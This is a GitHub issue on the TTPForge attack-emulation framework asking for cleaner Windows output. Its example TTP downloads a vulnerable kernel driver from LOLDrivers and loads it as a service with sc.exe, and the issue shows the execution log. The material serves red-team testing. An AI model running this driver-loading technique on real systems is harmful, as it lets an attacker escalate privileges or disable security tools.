search

facebookincubator / TTPForge

The TTPForge is a Cybersecurity Framework for developing, automating, and executing attacker Tactics, Techniques, and Procedures (TTPs).
MIT License
344 stars 34 forks source link

💡 [REQUEST] - [Windows] Remove shell commands from standard out #479

Closed godlovepenn closed 4 months ago

godlovepenn commented 10 months ago

Implementation PR

No response

Reference Issues

No response

Summary

Remove executed commands on Windows from standard out.

Basic Example

Example Draft TTP

Using LolDrivers
---
name: Loading Kernel Driver with sc.exe
description: |
  Download and load kernel driver with sc.exe. 
requirements: 
  platforms:
    - os: windows
mitre: 
  tactics:
    - TA0003
  techniques:
    - T1543
  subtechniques:
    - "T1543.003 Create or Modify System Process: Windows Service"
args:
  - name: service_name
    default: drive.bin 
  - name: file_hash
    default: 1f01257d9730f805b2a1d69099ef891d
steps:
  - name: get-driver-from-loldrivers
    fetch_uri: https://github.com/magicsword-io/LOLDrivers/raw/main/drivers/{{.Args.file_hash}}.bin
    overwrite: true
    location: bin\{{.Args.file_hash}}.bin
    cleanup:
      executor: powershell
      description: |
        1. Deleting driver service if found. 
        2. Removing downloaded driver from disk. 
      inline: | 
        $drivePath = Join-Path $PWD.Path "\bin\{{.Args.file_hash}}.bin"
        if (Get-Service -Name {{.Args.file_hash}} -ErrorAction SilentlyContinue) { sc.exe delete {{.Args.file_hash}} }
        Remove-Item $drivePath
        Write-Host "Driver removed from disk!"  
  - name: load-driver
    executor: powershell
    inline: |
      # pwd
      $drivePath = Join-Path $PWD.Path "\bin\{{.Args.file_hash}}.bin"
      # echo $drivePath
      if (-not (Get-Service -Name {{.Args.file_hash}} -ErrorAction SilentlyContinue)) { sc.exe create {{.Args.file_hash}} binPath= $drivePath type=kernel}
      sc.exe start {{.Args.file_hash}}
    cleanup: 
      executor: powershell
      description: |
        1. Stopping driver service from running.     
        2. Deleting driver service. 
        3. Removing downloaded driver from disk. 
      inline: | 
        $drivePath = Join-Path $PWD.Path "\bin\{{.Args.file_hash}}.bin"
        sc.exe stop {{.Args.file_hash}}
        Write-Host "Service stopped!"
        sc.exe delete {{.Args.file_hash}}
        Write-Host "Service deleted!"
        Remove-Item $drivePath
        Write-Host "Driver removed from disk!"
---

Execution command .\ttpforge.exe -c .\windowsttps\ttpforge-repo-config.yaml run .\windowsttps\ttps\T1543.003\ttplol.yml

Sample output

PS C:\Users\WDAGUtilityAccount> .\ttpforge.exe -c .\windowsttps\ttpforge-repo-config.yaml run .\windowsttps\ttps\T1543.003\ttplol.yml
←[34mINFO←[0m   [*] Validating TTP
←[34mINFO←[0m   [+] Finished validating steps
←[34mINFO←[0m   RUNNING TTP: Loading Kernel Driver with sc.exe
←[34mINFO←[0m   Executing Step #1: get-driver-from-loldrivers
←[34mINFO←[0m   ========= Executing ==========
←[34mINFO←[0m   ========= Result ==========
←[34mINFO←[0m   Executing Step #2: load-driver
INFO    [STDOUT] Windows PowerShell
INFO    [STDOUT] Copyright (C) Microsoft Corporation. All rights reserved.
INFO    [STDOUT]
INFO    [STDOUT] Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
INFO    [STDOUT]
INFO    [STDOUT]
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] #
INFO    [STDOUT]  pwd
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] $
INFO    [STDOUT] drivePath = Join-Path $PWD.Path "\bin\1f01257d9730f805b2a1d69099ef891d.bin"
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] #
INFO    [STDOUT]  echo $drivePath
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] i
INFO    [STDOUT] f (-not (Get-Service -Name 1f01257d9730f805b2a1d69099ef891d -ErrorAction SilentlyContinue)) { sc.exe create 1f01257d9730f805b2a1d69099ef891d binPath= $drivePath type=kernel}
←[34mINFO←[0m   [STDOUT] [SC] CreateService SUCCESS
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] s
INFO    [STDOUT] c.exe start 1f01257d9730f805b2a1d69099ef891d
←[34mINFO←[0m   [STDOUT] [SC] StartService FAILED 1275:
←[34mINFO←[0m   [STDOUT]
INFO    [STDOUT] This driver has been blocked from loading
INFO    [STDOUT]
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
ERROR   [*] Error executing TTP: exit status 1
INFO    [*] Beginning Cleanup

Preferred Output

PS C:\Users\WDAGUtilityAccount> .\ttpforge.exe -c .\windowsttps\ttpforge-repo-config.yaml run .\windowsttps\ttps\T1543.003\ttplol.yml
←[34mINFO←[0m   [*] Validating TTP
←[34mINFO←[0m   [+] Finished validating steps
←[34mINFO←[0m   RUNNING TTP: Loading Kernel Driver with sc.exe
←[34mINFO←[0m   Executing Step #1: get-driver-from-loldrivers
←[34mINFO←[0m   ========= Executing ==========
←[34mINFO←[0m   ========= Result ==========
←[34mINFO←[0m   Executing Step #2: load-driver
←[34mINFO←[0m   [STDOUT] [SC] CreateService SUCCESS
←[34mINFO←[0m   [STDOUT] [SC] StartService FAILED 1275:
INFO    [STDOUT] This driver has been blocked from loading
ERROR   [*] Error executing TTP: exit status 1
INFO    [*] Beginning Cleanup

Drawbacks

Unresolved questions

No response